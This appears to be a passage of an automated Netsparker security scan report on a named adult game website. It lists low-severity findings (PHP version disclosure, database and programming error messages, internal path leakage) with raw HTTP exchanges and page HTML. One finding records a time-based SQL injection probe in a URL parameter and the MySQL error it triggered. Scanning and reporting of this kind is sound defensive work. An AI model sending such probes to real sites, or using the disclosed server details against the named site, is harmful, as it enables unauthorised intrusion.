value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option>..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /user.php

/user.php

http://www.lessonofpassion.com/user.php?type=register

Extracted Version

PHP/5.2.11

Request

GET /user.php?type=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3988a8169a488a5762f12272eaa0f2d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4436
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Welcome to Lesson of Passion CLUB.<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = ""><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = ""><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = ""><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = ""><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option>..
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /games_best.php

/games_best.php

http://www.lessonofpassion.com/games_best.php?offset=%27;WAITFOR%20DELAY%20%270:0:25%27--&id=3&categ..

Parameters

Parameter Type Value
offset GET ';WAITFOR DELAY '0:0:25'--
id GET 3
category GET 3

Request

GET /games_best.php?offset=%27;WAITFOR%20DELAY%20%270:0:25%27--&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 165
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\';WAITFOR DELAY \'0:0:25\'--,20' at line 1
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /lopsalesforce/

/lopsalesforce/

http://www.lessonofpassion.com/lopsalesforce/

Identified Error Message

Request

GET /lopsalesforce/ HTTP/1.1
Referer: http://www.lessonofpassion.com/lopsalesforce/vert_3dac.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 270
Content-Type: text/html


<br /><b>Warning</b>: require_once(render_lop.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/admin/domains/lessonofpassion.com/public_html/lopsalesforce/index.php</b> on line <b>3</b><br /><br /><b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'render_lop.php' (include_path='.:/usr/local/lib/php') in <b>/home/admin/domains/lessonofpassion.com/public_html/lopsalesforce/index.php</b> on line <b>3</b><br />
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /lopsalesforce/

/lopsalesforce/

http://www.lessonofpassion.com/lopsalesforce/

Identified Internal Path(s)

Request

GET /lopsalesforce/ HTTP/1.1
Referer: http://www.lessonofpassion.com/lopsalesforce/vert_3dac.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 270
Content-Type: text/html


<br /><b>Warning</b>: require_once(render_lop.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/admin/domains/lessonofpassion.com/public_html/lopsalesforce/index.php</b> on line <b>3</b><br /><br /><b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'render_lop.php' (include_path='.:/usr/local/lib/php') in <b>/home/admin/domains/lessonofpassion.com/public_html/lopsalesforce/index.php</b> on line <b>3</b><br />